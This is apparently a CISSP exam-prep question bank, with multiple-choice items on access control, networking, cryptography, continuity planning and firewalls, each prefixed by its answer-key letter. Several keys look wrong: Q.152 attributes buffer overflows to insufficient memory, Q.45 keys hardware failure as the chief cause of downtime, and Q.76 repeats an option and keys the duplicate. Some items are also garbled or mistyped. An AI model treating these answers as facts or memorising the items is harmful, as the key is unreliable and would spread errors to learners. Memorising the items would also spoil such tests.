A#CISSP3 Q.8:  Which access control model enables the owner of the resource to specify what subjects can access specific resources?  	^A: Discretionary Access Control	^B: Mandatory Access Control	^C: Sensitive Access Control	^D: Role -based Access Control
C#CISSP3 Q.9:  What type of cable is used with 100Base-TX Fast Ethernet?	^A: Fiber-optic cable	^B: Four pairs of Category 3, 4 or 5 unshielded twisted-par (UTP) wires.	^C: Two pairs of Category 5 unshielded twisted-pair (UTP) or Category 1 shielded twisted-pair (STP) wires.	^D: RG.58 cable.			
B#CISSP3 Q.10:  Which of the following best describes the Secure Electronic Transaction (SET) protocol?	^A: Originated by VISA and MasterCard as an Internet credit card protocol.	^B: Originated by VISA and MasterCard as an Internet credit card protocol using digital signatures.	^C: Originated by VISA and MasterCard as an Internet credit card protocol using the transport layer.	^D: Originated by VISA and MasterCard as an Internet credit card protocol using SSL.			
D#CISSP3 Q.11:  At which of the following phases of a software development life cycle are security and access controls	normally designed?	^A: Coding	^B: Product design	^C: Software plans and requirements	^D: Detailed design			
C#CISSP3 Q.12:  Which type of control would password management classify as?	^A: Compensating control	^B: Detective control	^C: Preventive control	^D: Technical control
C#CISSP3 Q.13:  Due are is not related to:  	^A: Good faith	^B: Prudent man	^C: Profit	^D: Best interest
D#CISSP3 Q.14:  Which of the following is not an Orange Book-defined life cycle assurance requirement?	^A: Security testing	^B: Design specification and testing	^C: Trusted distribution	^D: System integrity
A#CISSP3 Q.15:  What is another name for the Orange Book?  	^A: The Trusted Computer System Evaluation Criteria (TCSEC)	^B: The Trusted Computing Base (TCB)	^C: The Information Technology Security Evaluation Criteria (ITSEC)	^D: The Common Criteria
C#CISSP3 Q.16:  A password that is the same for each log-on session is called a?  	^A: one-time password	^B: two-time password	^C: static password	^D: dynamic password
C#CISSP3 Q.17:  Which of the following backup methods is most appropriate for off-site archiving?  	^A: Incremental backup method.	^B: Off-site backup method.	^C: Full backup method.	^D: Differential backup method.
C#CISSP3 Q.18:  Which of the following is not a weakness of symmetric cryptography?  	^A: Limited security	^B: Key distribution	^C: Speed	^D: Scalability
B#CISSP3 Q.19:  Which of the following is not a defined layer in the TCP/IP protocol model?  	^A: Application layer	^B: Session layer	^C: Internet layer	^D: Network access layer
A#CISSP3 Q.20:  Rewritable and erasable (CDR/W) optical disk are sometimes used for backups that require short time storage for changeable data, but require?  	^A: Faster file access than tape.	^B: Slower file access than tape.	^C: Slower file access than drive.	^D: Slower file access than scale.
B#CISSP3 Q.21:  Which one of the following is not a primary component or aspect of firewall systems?  	^A: Protocol filtering	^B: Packet switching	^C: Rule enforcement engine	^D: Extended logging capability
C#CISSP3 Q.22:  What are database views used for?  	^A: To ensure referential integrity.	^B: To allow easier access to data in a database.	^C: To restrict user access to data in a database.	^D: To provide audit trails.
B#CISSP3 Q.23:  Which of the following Common Data Network Services is used to send and receive email internally or externally through an email gateway device?  	^A: File services	^B: Mail services	^C: Print services	^D: Client/Server services
D#CISSP3 Q.24:  Intrusion detection has which of the following sets of characteristics.  	^A: It is adaptive rather than preventive.	^B: It is administrative rather than preventive.	^C: It is disruptive rather than preventative.	^D: It is detective rather than preventative.
A#CISSP3 Q.25:  Which type of password provides maximum security because a new password is required for each now log-on is defined to as?  	^A: One-time or dynamic password	^B: Cognitive password	^C: Static password	^D: Pass phrase
B#CISSP3 Q.26:  They in form of credit card-size memory cards or smart cards, or those resembling small calculators, are used to supply static and dynamic passwords are called?	^A: Token Ring	^B: Tokens	^C: Token passing networks	^D: Coupons
A#CISSP3 Q.27:  Which of the following uses a directed graph to specify the rights that a subject can transfer to an object, or that a subject can take from another subject?	^A: Take-Grant model	^B: Access Matrix model	^C: Biba model	^D: Bell-Lapadula model			
D#CISSP3 Q.28:  Which of the following is the BEST way to prevent software license violations?	^A: Implementing a corporate policy on copyright infringements and software use. ^B: Requiring that all PCs be diskless workstations. ^C: Installing metering software on the LAN so applications can be accessed through the metered software.	^D: Regularly scanning used PCs to ensure that unauthorized copies of software have not been loaded on the PC.			
A#CISSP3 Q.29:  Zip/Jaz drives, SyQuest, and Bemoulli boxes are very transportable and are often the standard for?	^A: Data exchange in many businesses.	^B: Data change in many businesses.	^C: Data compression in many businesses.	^D: Data interchange in many businesses.			
D#CISSP3 Q.30:  What are two types of system assurance?	^A: Operational Assurance and Architecture Assurance.	^B: Design Assurance and Implementation Assurance.	^C: Architecture Assurance and Implementation Assurance.	^D: Operational Assurance and Life-Cycle Assurance.			
A#CISSP3 Q.31:  Why does compiled code pose more risk than interpreted code?	^A: Because malicious code can be embedded in the compiled code and can be difficult to detect.	^B: Because the browser can safely execute all interpreted applets.	^C: Because compilers are not reliable.	^D: It does not. Interpreted code poses more risk than compiled code.			
C#CISSP3 Q.32:  Which model, based on the premise that the quality of a software product is a direct function of the quality of its associated software development and maintenance processes, introduced five levels with which the maturity of an organization involved in the software process is evaluated?	^A: The Total Quality Model (TQM)	^B: The IDEAL Model	^C: The Software Capability Maturity Model	^D: The Spiral Model
A#CISSP3 Q.33:  Phreakers are hackers who specialize in telephone fraud. What type of telephone fraud simulates the tones of coins being deposited into a payphone?  	^A: Red Boxes	^B: Blue Boxes	^C: White Boxes	^D: Black Boxes
C#CISSP3 Q.34:  What is the proper term to refer to a single unit of Ethernet data?	^A: Ethernet segment	^B: Ethernet datagram	^C: Ethernet frame	^D: Ethernet packet
A#CISSP3 Q.35:  Which of the following represents an ALE calculation?	^A: Singe loss expectancy x annualized rate of occurrence.	^B: Gross loss expectancy x loss frequency.	^C: Actual repla cement cost  proceeds of salvage.	^D: Asset value x loss expectancy.			
A#CISSP3 Q.36:  IF an operating system permits executable objects to be used simultaneously by multiple users without a refresh of the objects, what security problem is most likely to exist?	^A: Disclosure of residual data.	^B: Unauthorized obtaining of a privileged execution state.	^C: Data leakage through covert channels.	^D: Denial of service through a deadly embrace.			
A#CISSP3 Q.37:  Tape arrays use a large device with multiple (sometimes 32 or 64) tapes that are configured as a?	^A: Single array	^B: Dual array	^C: Triple array	^D: Quadruple array			
D#CISSP3 Q.38:  Why would anomaly detection IDSs often generate a large number of false positives?	^A: Because they can only identify correctly attacks they already know about.	^B: Because they are application-based are more subject to attacks.	^C: Because they cant identify abnormal behavior.	^D: Because normal patterns of user and system behavior can vary wildly
C#CISSP3 Q.39:  According to private sector data classification levels, how would salary levels and medical information be classified?  	^A: Public	^B: Sensitive	^C: Private	^D: Confidential
B#CISSP3 Q.40:  Which of the following is used in database information security to hide information?  	^A: Inheritance	^B: Polyinstantiation	^C: Polymorphism	^D: Delegation
A#CISSP3 Q.41:  Which of the following evaluates the product against the specification?  	^A: Verification	^B: Validation	^C: Concurrence	^D: Accuracy
D#CISSP3 Q.42:  Application Level Firewalls are commonly a host computer running proxy server software, which makes a?  	^A: Proxy Client	^B: Proxy Session	^C: Proxy System	^D: Proxy Server
B#CISSP3 Q.43:  What attack involves the perpetrator sending spoofed packet(s) with the SYN flag set to the victims machine on any open port that is listening?	^A: Bonk attack	^B: Land attack	^C: Teardrop attack	^D: Smurf attack
A#CISSP3 Q.44:  The beginning and the end of each transfer during asynchronous communication data transfer are marked by?  	^A: Start and Stop bits.	^B: Start and End bits.	^C: Begin and Stop bits.	^D: Start and Finish bits.
A#CISSP3 Q.45:  Most of unplanned downtime of information systems is attributed to which of the following?  	^A: Hardware failure	^B: Natural disaster	^C: Human error	^D: Software failure
A#CISSP3 Q.46:  Raid that functions as part of the operating system on the file server  	^A: Software implementation	^B: Hardware implementation	^C: Network implementation	^D: Netware implementation
C#CISSP3 Q.47:  During which phase of an IT system life cycle are security requirements developed?  	^A: Operation	^B: Initiation	^C: Development	^D: Implementation
B#CISSP3 Q.48:  Ensuring that printed reports reach proper users and that receipts are signed before releasing sensitive documents are examples of?  	^A: Deterrent controls	^B: Output controls	^C: Information flow controls	^D: Asset controls
B#CISSP3 Q.49:  Non-Discretionary Access Control. A central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on?  	^A: The societies role in the organization.	^B: The individuals role in the organization.	^C: The group-dynamics as they relate to the individuals role in the organization.	^D: The group-dynamics as they relate to the master-slave role in the organization.
B#CISSP3 Q.50:  An effective information security policy should not have which of the following characteristics?  	^A: Include separation of duties.	^B: Be designed with a short-to mid-term focus.	^C: Be understandable and supported by all stakeholders.	^D: Specify areas of responsibility and authority.
B#CISSP3 Q.51:  Which of the following statements pertaining to secure information processing facilities is incorrect?  	^A: Walls should have an acceptable fire rating.	^B: Windows should be protected by bars.	^C: Doors must resist forcible entry.	^D: Location and type of fire suppression systems should be known.
D#CISSP3 Q.52:  Making sure that the data is accessible when and where it is needed is which of the following?  	^A: Confidentiality	^B: Integrity	^C: Acceptability	^D: Availability
B#CISSP3 Q.53:  Business continuity plan development depends most on?  	^A: Directives of Senior Management	^B: Business Impact Analysis (BIA)	^C: Scope and Plan Initiation	^D: Skills of BCP committee
D#CISSP3 Q.54:  Which layer defines the X.25, V.35, X,21 and HSSI standard interfaces?	^A: Transport layer	^B: Network layer	^C: Data link layer	^D: Physical layer
D#CISSP3 Q.55:  Related to information security, availability is the opposite of which of the following?  	^A: Delegation	^B: Distribution	^C: Documentation	^D: Destruction
A#CISSP3 Q.56:  Which of the following is a disadvantage of a behavior-based ID system?  	^A: The activity and behavior of the users while in the networked system may not be static enough to effectively implement a behavior-based ID system.	^B: The activity and behavior of the users while in the networked system may be dynamic enough to effectively implement a behavior-based ID system.	^C: The activity and behavior of the users while in the networked system may not be dynamic enough to effectively implement a behavior-based ID system.	^D: The system is characterized by high false negative rates where intrusions are missed.
C#CISSP3 Q.57:  Which of the following statements pertaining to VPN protocol standards is false?  	^A: L2TP is a combination of PPTP and L2F.	^B: L2TP and PPTP were designed for single point-to-point client to server communication.	^C: L2TP operates at the network layer.	^D: PPTP uses native PPP authentication and encryption services.
C#CISSP3 Q.58:  What is the most critical characteristic of a biometric identifying system?  	^A: Perceived intrusiveness	^B: Storage requirements	^C: Accuracy	^D: Reliability
A#CISSP3 Q.59:  RAID Software can run faster in the operating system because neither use the hardware -level parity drives by?  	^A: Simple striping or mirroring.	^B: Hard striping or mirroring.	^C: Simple hamming code parity or mirroring.	^D: Simple striping or hamming code parity.
A#CISSP3 Q.60:  The guarantee that the message sent is the message received, and that the message was not intentionally or unintentionally altered is?  	^A: Integrity	^B: Confidentiality	^C: Availability	^D: Identity
B#CISSP3 Q.61:  Which of the following is a preventive control?  	^A: Motion detectors	^B: Guard dogs	^C: Audit logs	^D: Intrusion detection systems
B#CISSP3 Q.62:  What uses a key of the same length as the message?  	^A: Running key cipher	^B: One-time pad	^C: Steganography	^D: Cipher block chaining
A#CISSP3 Q.63:  Which of the following protocols operates at the session layer (layer 5)?  	^A: RPC	^B: IGMP	^C: LDP	^D: SPX
B#CISSP3 Q.64:  Which of the following are NOT a countermeasure to traffic analysis?  	^A: Padding messages	^B: Eavesdropping	^C: Sending noise	^D: Covert channel analysis
C#CISSP3 Q.65:  Which of the following layers of the ISO/OSI model do packet filtering firewalls operate at? 	^A: Application layer	^B: Session layer	^C: Network layer	^D: Presentation layer
C#CISSP3 Q.66:  A prolonged high voltage is?  	^A: Spike	^B: Blackout	^C: Surge ^D: Fault
D#CISSP3 Q.67:  How do the Information Labels of Compartmented Mode Workstation differ from the Sensitivity Levels of B3 evaluated systems?  	^A: Information Labels in CMW are homologous to Sensitivity Labels, but a different term was chosen to emphasize that CMWs are not described in the Orange Book.	^B: Information La bels contain more information than Sensitivity Labels, thus allowing more granular access decisions to be made.	^C: Sensitivity Labels contain more information than Information Labels because B3+ systems should store more sensitive data than workstations.	^D: Information Labels contain more information than Sensitivity Labels, but are not used by the Reference Monitor to determine access permissions.
A#CISSP3 Q.68:  In what security mode can a system be operating if all users have the clearance or authorization and need-to-know to all data processed within the system?  	^A: Dedicated security mode.	^B: System-high security mode.	^C: Compartmented security mode.	^D: Multilevel security mode.
D#CISSP3 Q.69:  What are the three conditions that must be met by the reference monitor?	^A: Confidentiality, availability and integrity.	^B: Policy, mechanism and assurance.	^C: Isolation, layering and abstraction.	^D: Isolation, completeness and verifiability.
B#CISSP3 Q.70:  While referring to Physical Security, what does Positive pressurization means?  	^A: The pressure inside your sprinkler system is greater than zero.	^B: The air goes out of a room when a door is opened and outside air does not go into the room.	^C: Causes the sprinkler system to go off.	^D: A series of measures that increase pressure on employees in order to make them more productive.
C#CISSP3 Q.71:  The baseline sets certain thresholds for specific errors or mistakes allowed and the amount of these occurrences that can take place before it is considered suspicious?  	^A: Checkpoint level	^B: Ceiling level	^C: Clipping level	^D: Threshold level
B#CISSP3 Q.72:  The most prevalent cause of computer center fires is which of the following?  	^A: AC equipment	^B: Electric al distribution systems.	^C: Heating systems	^D: Natural causes
C#CISSP3 Q.73:  An offsite backup facility intended to operate an information processing facility, having no computer or communications equipment, but having flooring, electrical writing, air conditioning, etc: Is better known as a?  	^A: Hot site	^B: Duplicate processing facility	^C: Cold site	^D: Warm site
C#CISSP3 Q.74:  Which of the following are necessary components of a Multi-Level Security Policy?  	^A: Sensitivity Labels and a system high evaluation.	^B: Sensitivity Labels and Discretionary Access Control.	^C: Sensitivity Labels and Mandatory Access Control.	^D: Object Labels and a system high evaluation.
A#CISSP3 Q.75:  Which of the following, used to extend a network, has a storage capacity to store frames and act as a store -and-forward device?  	^A: Bridge	^B: Router	^C: Repeater	^D: Gateway
D#CISSP3 Q.76:  Which of the following is addressed by Kerberos?  	^A: Confidentiality and integrity.	^B: Authorization and authentication.	^C: Validation and integrity.	^D: Confidentiality and integrity.
A#CISSP3 Q.77:  Access Control techniques do not include which of the following choices?	^A: Relevant Access Controls	^B: Discretionary Access Control	^C: Mandatory Access Control	^D: Lattice Based Access Control
D#CISSP3 Q.78:  Why is public key cryptography recommended for use in the process of securing facsimiles during transmission?  	^A: Keys are never transmitted over the network.	^B: Data compression decreases key change frequency.	^C: Key data is not recognizable from facsimile data.	^D: The key is securely passed to the receiving machine.
A#CISSP3 Q.79:  Database views are not used to:  	^A: Implement referential integrity.	^B: Implement least privilege.	^C: To implement content-dependent access restrictions.	^D: Implement need-to-know.
B#CISSP3 Q.80:  Which of the following is most concerned with personnel security?  	^A: Management controls	^B: Operational controls	^C: Technical controls	^D: Human resources controls.
A#CISSP3 Q.81:  Which of the following statements pertaining to the Trusted Computer System Evaluation Criteria (TCSEC) is incorrect?  	^A: With TCSEC, functionality and assurance are evaluated separately.	^B: TCSEC provides a means to evaluate the trustworthiness of an information system.	^C: The Orange book does not cover networks and communications.	^D: Data base management systems are not covered by the TCSEC.
B#CISSP3 Q.82:  Which of the following could illegally capture network user passwords?	^A: Data diddling	^B: Sniffing	^C: Spoofing	^D: Smurfing			
A#CISSP3 Q.83:  Which trusted facility management concept implies that two operators must review and approve the work of each other?	^A: Two-man control	^B: Dual control	^C: Double control	^D: Segregation control			
B#CISSP3 Q.84:  There are more than 20 books in the Rainbow Series. Which of the following covers password management guidelines?	^A: Orange Book	^B: Green Book	^C: Red Book	^D: Lavender Book
D#CISSP3 Q.85:  Which of the following is an ip address that is private? (i.e. reserved for internal networks, and not a valid address to use on the Internet)?  	^A: 172.5.42.5	^B: 172.76.42.5	^C: 172.90.42.5	^D: 172.16.42.5
C#CISSP3 Q.86:  How fast is private key cryptography compared to public key cryptography?  	^A: 10 to 100 times faster.	^B: 100 to 1000 times faster.	^C: 1000 to 10000 times faster	^D: 10000 to 20000 times faster.
C#CISSP3 Q.87:  The continual effort of making sure that the correct policies, procedures and standards are in place and being followed is described as what?	^A: Due care	^B: Due concern	^C: Due diligence	^D: Due practice			
A#CISSP3 Q.88:  Which tape format type is mostly used for home/small office backups?	^A: Quarter Inch Cartridge drives (QIC)	^B: Digital Linear Tapes (DLT)	^C: 8mm tape	^D: Digital Audio Tape (DAT)			
C#CISSP3 Q.89:  In an organization, an Information Technology security function should:	^A: Be a function within the information systems function of an organization.	^B: Report directly to a specialized business unit such as legal, corporate security or insurance.	^C: Be lead by a Chief Security Officer and report directly to the CEO.	^D: Be independent but report to the Information Systems function.			
C#CISSP3 Q.90:  Who of the following is responsible for ensuring that proper controls are in place to address integrity, confidentiality, and availability of IT systems and data?	^A: Business and functional managers.	^B: IT Security practitioners.	^C: System and information owners.	^D: Chief information officer
A#CISSP3 Q.91:  The act of requiring two of the three factors to be used in the authentication process refers to?  	^A: Two-Factor Authentication	^B: One-Factor Authentication	^C: Bi-Factor Authentication	^D: Double Authentication
A#CISSP3 Q.92:  This type of backup management provides a continuous on-line backup by using optical or tape jukeboxes, similar to WORMs, (Write Once, Read Many)  	^A: Hierarchical Storage Management (HSM).	^B: Hierarchical Resource Management (HRM).	^C: Hierarchical Access Management (HAM).	^D: Hierarchical Instance Management (HIM).
D#CISSP3 Q.93:  Which of the following elements is not included in a Public Key Infrastructure (PKI)?  	^A: Timestamping	^B: Lightweight Directory Access Protocol (LDAP)	^C: Certificate revocation	^D: Internet Key Exchange (IKE)
B#CISSP3 Q.94:  Which of the following best corresponds to the type of memory addressing where the address location that is specified in the program instruction contains the address of the final desired location?  	^A: Direct addressing	^B: Indirect addressing	^C: Indexed addressing	^D: Program addressing
B#CISSP3 Q.95:  Creation and maintenance of intrusion detection systems and processes for the following is one of them identify it:  	^A: Event nonrepudiation	^B: Event notification	^C: Netware monitoring	^D: Guest access
A#CISSP3 Q.96:  Which of the following is true related to network sniffing?	^A: Sniffers allow an attacker to monitor data passing across a network.	^B: Sniffers alter the source address of a computer to disguise and exploit weak authentication methods,	^C: Sniffers take over network connections	^D: Sniffers send IP fragments to a system that overlap with each other.
A#CISSP3 Q.97:  Which of the following protocols is not implemented at the Internet layer of the TCP/IP protocol model?  	^A: User datagram protocol (UDP)	^B: Internet protocol (IP)	^C: Address resolution protocol (ARP)	^D: Internet control message protocol (ICMP)
B#CISSP3 Q.98:  Which of the following is used to help business units understand the impact of a disruptive event?  	^A: A risk analysis.	^B: A business impact assessment.	^C: A vulnerability assessment.	^D: A disaster recovery plan.
B#CISSP3 Q.99:  A contingency plan should address?  	^A: Potential risks	^B: Residual risks	^C: Identified risks	^D: All of the above
A#CISSP3 Q.100:  In the OSI/ISO model, at what level is SET (SECURE ELECTRONIC TRANSACTION PROTOCOL) provided?  	^A: Application	^B: Network	^C: Presentation	^D: Session
A#CISSP3 Q.101:  A packet filtering firewall looks at the data packet to get information about the source and destination addresses of an incoming packet, the sessions communications protocol (TCP, UDP or ICMP), and the source destination application port for the?  	^A: Desired service	^B: Dedicated service	^C: Delayed service	^D: Distributed service.
A#CISSP3 Q.102:  Packet Filtering Firewalls system is considered a?  	^A: First generation firewall.	^B: Second generation firewall.	^C: Third generation firewall.	^D: Fourth generation firewall.
D#CISSP3 Q.103:  When should a post-mortem review meeting be held after an intrusion has been properly taken care of?  	^A: Within the first three months after the investigation of the intrusion is completed.	^B: Within the first week after prosecution of intruders have taken place, whether successful or not.	^C: Within the first month after the investigation of the intrusion is completed.	^D: Within the first week of completing the investigation of the intrusion.
A#CISSP3 Q.104:  Which of the following can be used as a covert channel?  	^A: Storage and timing.	^B: Storage and low bits.	^C: Storage and permissions.	^D: Storage and classification.			
C#CISSP3 Q.105:  Which software development model is actually a meta-model that incorporates a number of the software development models?	^A: The Waterfall model.	^B: The modified Waterfall model.	^C: The Spiral model.	^D: The Critical Patch Model (CPM).			
B#CISSP3 Q.106:  What is not true with pre -shared key authentication within IKE / IPsec protocol:	^A: Pre-shared key authentication is normally based on simple passwords.	^B: Needs a PKI to work.	^C: Only one preshared key for all VPN connections is needed.	^D: Costly key management on large user groups.			
C#CISSP3 Q.108:  In order to ensure the privacy and integrity of the data, conne ctions between firewalls over public networks should use?  	^A: Screened subnets	^B: Digital certificates	^C: Encrypted Virtual Private Networks 	^D: Encryption
D#CISSP3 Q.109:  What is necessary for a subject to have write access to an object in a Multi-Level Security Policy?  	^A: The subjects sensitivity label must dominate the objects sensitivity label. ^B: The subjects sensitivity label subordinates the objects sensitivity label. ^C: The subjects sensitivity label is subordinated by the objects sensitivity label. ^D: The subjects sensitivity label is dominated by the objects sensitivity label.
B#CISSP3 Q.110:  What best describes a scenario when an employee has been shaving off pennies from multiple accounts and depositing the funds into his own ban account?   ^A: Data fiddling ^B: Data diddling ^C: Data hiding ^D: Data masking
A#CISSP3 Q.111:  Which of the following is unlike the other three?   ^A: El Gamal ^B: Teardrop ^C: Buffer Overflow ^D: Smurf
D#CISSP3 Q.112:  Phreakers are hackers who specialize in telephone frau^D: What type of telephone fraud manipulates the line voltage to receive a tool-free call?   ^A: Red Boxes ^B: Blue Boxes ^C: White Boxes ^D: Black Boxes
D#CISSP3 Q.113:  Which of the following groups represents the leading source of computer crime losses?   ^A: Hackers ^B: Industrial saboteurs ^C: Foreign intelligence officers ^D: Employees
A#CISSP3 Q.114:  Which of the following steps should be performed first in a business impact analysis (BIA)?   ^A: Identify all business units within the organization. ^B: Evaluate the impact of disruptive events. ^C: Estimate the Recovery Time Objectives (RTO). ^D: Evaluate the criticality of business functions.
C#CISSP3 Q.115:  Which of the following embodies all the detailed actions that personnel are required to follow?   ^A: Standards ^B: Guidelines ^C: Procedures ^D: Baselines
D#CISSP3 Q.116:  Immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length (up to two kilometers in some cases) is?   ^A: Coaxial cable ^B: Twisted Pair cable ^C: Axial cable ^D: Fiber Optic cable
A#CISSP3 Q.117:  Which of the following is the most reliable, secure means of removing data from magnetic storage media such as a magnetic tape, or cassette?   ^A: Degaussing ^B: Parity Bit Manipulation ^C: Certification ^D: Buffer overflow
A#CISSP3 Q.118:  Which of the following is an advantage of prototyping?   ^A: Prototype systems can provide significant time and cost savings. ^B: Change control is often less complicated with prototype systems. ^C: It ensures that functions or extras are not added to the intended system. ^D: Strong internal controls are easier to implement.
A#CISSP3 Q.119:  The IS security analysts participation in which of the following system development life cycle phases provides maximum benefit to the organization?   ^A: System requirements definition. ^B: System design. ^C: Program development. ^D: Program testing.
C#CISSP3 Q.120:  Controls are implemented to?   ^A: Eliminate risk and reduce the potential for loss. ^B: Mitigate risk and eliminate the potential for loss. ^C: Mitigate risk and reduce the potential for loss. ^D: Eliminate risk and eliminate the potential for loss.
A#CISSP3 Q.121:  A circuit level gateway is ________ when compared to an application level firewall.   ^A: Easier to maintain. ^B: More difficult to maintain. ^C: More secure. ^D: Slower
C#CISSP3 Q.122:  In IPSec, if the communication mode is gateway-gateway or host-gateway:   ^A: Only tunnel mode can be used. ^B: Only transport mode can be used. ^C: Encapsulating Security Payload (ESP) authentication must be used.	^D: Both tunnel and transport mode can be used.
C#CISSP3 Q.123:  Which integrity model defines a constrained data item, an integrity verification procedure and a transformation procedure?  	^A: The Take-Grant model	^B: The Biba integrity model	^C: The Clark Wilson integrity model	^D: The Bell-LaPadula integrity model
A#CISSP3 Q.124:  Which of the following rules pertaining to a Business Continuity Plan/Disaster Recovery Plan is incorrect?  	^A: In order to facilitate recover, a single plan should cover all locations.	^B: There should be requirements for to form a committee to decide a course of action. These decisions should be made ahead of time and incorporated into the plan.	^C: In its procedures and tasks, the plan should refer to functions, not specific individuals.	^D: Critical vendors should be contacted ahead of time to validate equipment can be obtained in a timely manner.
C#CISSP3 Q.125:  What are suitable protocols for securing VPN connections?  	^A: S/MIME and SSH	^B: TLS and SSL	^C: IPsec and L2TP	^D: PKCS and X.509
D#CISSP3 Q.126:  Which of the following questions is less likely to help in assessing identification and authentication controls?  	^A: Is a current list maintained and approved of authorized users and their access?	^B: Are passwords changed at least every ninety days or earlier if needed?	^C: Are inactive user identifications disabled after a specified period of time?	^D: Is there a process for reporting incidents?
B#CISSP3 Q.127:  The primary purpose for using one -way encryption of user passwords within a system is which of the following?  	^A: It prevents an unauthorized person from trying multiple passwords in one logon attempt.	^B: It prevents an unauthorized person from reading or modifying the password list.	^C: It minimizes the amount of storage required for user passwords.	^D: It minimizes the amount of processing time used for encrypting passwords.
D#CISSP3 Q.128:  The security of a computer application is most effective and economical in which of the following cases?  	^A: The system is optimized prior to the addition of security.	^B: The system is procured off-the-shelf.	^C: The system is customized to meet the specific security threat.	^D: The system is designed originally to provide the necessary security.
D#CISSP3 Q.129:  In the following choices there is one that is a typical biometric characteristics that is not used to uniquely authenticate an individuals identity?  	^A: Retina scans	^B: Iris scans	^C: Palm scans	^D: Skin scans
A#CISSP3 Q.130:  Which of the following proves or disproves a specific act though oral testimony based on information gathered through the witnesss five senses?  	^A: Direct evidence	^B: Circumstantial evidence	^C: Conclusive evidence	^D: Corroborative evidence
B#CISSP3 Q.131:  Which of the following would be defined as an absence of safeguard that could be exploited?  	^A: A threat	^B: A vulnerability	^C: A risk	^D: An exposure
D#CISSP3 Q.132:  Which of the following is a LAN transmission protocol?  	^A: Ethernet	^B: Ring topology	^C: Unicast	^D: Polling
B#CISSP3 Q.133:  Why would a database be denormalized?	^A: To ensure data integrity.	^B: To increase processing efficiency.	^C: To prevent duplication of data.	^D: To save storage space.
C#CISSP3 Q.134:  Under Named Perils form of Property insurance  	^A: Burden of proof that particular loss is covered is on Insurer.	^B: Burden of proof that particular loss is not covered is on Insurer.	^C: Burden of proof that particular loss is covered is on Insured.	^D: Burden of proof that particular loss is not covered is on Insured.
C#CISSP3 Q.135:  The following is not true:	^A: Since the early days of mankind humans have struggled with the problems of protecting assets.	^B: The addition of a PIN keypad to the card reader was a solution to unreported card or lost card problem.	^C: There has never been of problem of lost keys.	^D: Human guard is an inefficient and sometimes ineffective method of protecting resources.
C#CISSP3 Q.136:  Which of the following statements pertaining to software testing approaches is correct?  	^A: A bottom-up approach allows interface errors to be detected earlier.	^B: A top-down approach allows errors in critical modules to be detected earlier.	^C: The test plan and results should be retained as part of the systems permanent documentation.	^D: Black box testing is predicted on a close examination of procedural detail.
C#CISSP3 Q.137:  Which Orange Book evaluation level is described as Structured Protection?  	^A: A1	^B: B3	^C: B2	^D: B1
C#CISSP3 Q.138:  Which of the following questions should any user not be able to answer regarding their organization information security policy?  	^A: Who is involved in establishing the security policy?	^B: Where is the organization security policy defined?	^C: What are the actions that need to be performed in case of a disaster?	^D: Who is responsible for monitoring compliance to the organization security policy?
A#CISSP3 Q.139:  RAID Level 1 mirrors the data from one disk to set of disks using which of the following techniques?	^A: Copying the data onto another disk or set of disks.^B: Moving the data onto another disk or set of disks.	^C: Establishing dual connectivity to another disk or set of disks.	^D: Establishing dual addressing to another disk or set of disks.
A#CISSP3 Q.140:  Which type of firewall can be used to track connectionless protocols such as UDP and RPC?  	^A: Statefull inspection firewalls	^B: Packet filtering firewalls	^C: Application level firewalls	^D: Circuit level firewalls
C#CISSP3 Q.141:  Which of the following items should not be retained in an E-mail directory?  	^A: Drafts of documents.	^B: Copies of documents.	^C: Permanent records.	^D: Temporary documents.
C#CISSP3 Q.142:  Which of the following department managers would be best suited to oversee the development of an information security policy?  ^A: Information systems	^B: Human resources	^C: Business operations	^D: Security administration
B#CISSP3 Q.143:  Which of the following counterme asures is not appropriate for war dialing attacks?  	^A: Monitoring and auditing for such activity.	^B: Disabling call forwarding.	^C: Making sure only necessary phone numbers are made public.	^D: Using completely different numbers for voice and data accesses.
B#CISSP3 Q.144:  Which of the following tools is less likely to be used by a hacker?	^A: I0phtcrack	^B: Tripwire	^C: Crack	^D: John the Ripper
A#CISSP3 Q.145:  Which of the following logical access exposures involves changing data before, or as it is entered into the computer?  	^A: Data diddling	^B: Salami techniques	^C: Trojan horses	^D: Viruses
B#CISSP3 Q.146:  Which of the following computer aided software engineering (CASE) products is used for developing detailed designs, such as screen and report layouts?  	^A: Lower CASE	^B: Middle CASE	^C: Upper CASE	^D: I-CASE
C#CISSP3 Q.147:  What is called the number of columns in a table?  	^A: Schema	^B: Relation	^C: Degree	^D: Cardinality
B#CISSP3 Q.148:  Which of the following is the most reliable authentication device?  	^A: Variable callback system	^B: Smart Card system	^C: Fixed callback system	^D: Combination of variable and fixed callback system.
C#CISSP3 Q.149:  Which of the following firewall rules is less likely to be found on a firewall installed between and organization internal network and the Internet?	^A: Permit all traffic to and from local host.	^B: Permit all inbound ssh traffic	^C: Permit all inbound tcp connections.	^D: Permit all syslog traffic to log-server.abc.org.
B#CISSP3 Q.150:  The Internet can be utilized by either?  	^A: Public or private networks (with a Virtual Private Networks).	^B: Private or public networks (with a Virtual Private Networks).	^C: Home or private networks (with a Virtual Private Networks).	^D: Public or home networks (with a Virtual Private Networks).
A#CISSP3 Q.151:  This backup method must be made regardless of whether Differential or Incremental methods are used. 	^A: Full Backup Method	^B: Incremental backup method	^C: Differential backup method	^D: Tape backup method
D#CISSP3 Q.152:  Why do buffer overflows happen? 	^A: Because buffers can only hold so much data.	^B: Because input data is not checked for appropriate length at time of input.	^C: Because they are an easy weakness to exploit.	^D: Because of insufficient system memory.
C#CISSP3 Q.153:  Which of the following should not be performed by an operator?  	^A: Mounting disk or tape	^B: Backup and recovery	^C: Data entry	^D: Handling hardware
C#CISSP3 Q.154:  What security model is dependant on security labels?  	^A: Discretionary access control	^B: Label-based access control	^C: Mandatory access control	^D: Non-discretionary access control
A#CISSP3 Q.155:  Detection capabilities of Host-based ID systems are limited by the incompleteness of which of the following?  	^A: Audit log capabilities	^B: Event capture capabilities	^C: Event triage capabilities	^D: Audit notification capabilities
B#CISSP3 Q.156:  Computer crime is generally made possible by which of the following?  	^A: The perpetrator obtaining training & special knowledge.	^B: Victim carelessness.	^C: Collusion with others in information processing	^D: System design flaws.
A#CISSP3 Q.157:  The structures, transmission methods, transport formats, and security measures that are used to provide integrity, availability, authentication, and confidentiality for transmissions over private and public communications networks and media includes?  	^A: The Telecommunications and Network Security domain.	^B: The Telecommunications and Netware Security domain.	^C: The Technical communications and Network Security domain.	^D: The Telnet and Network Security domain.
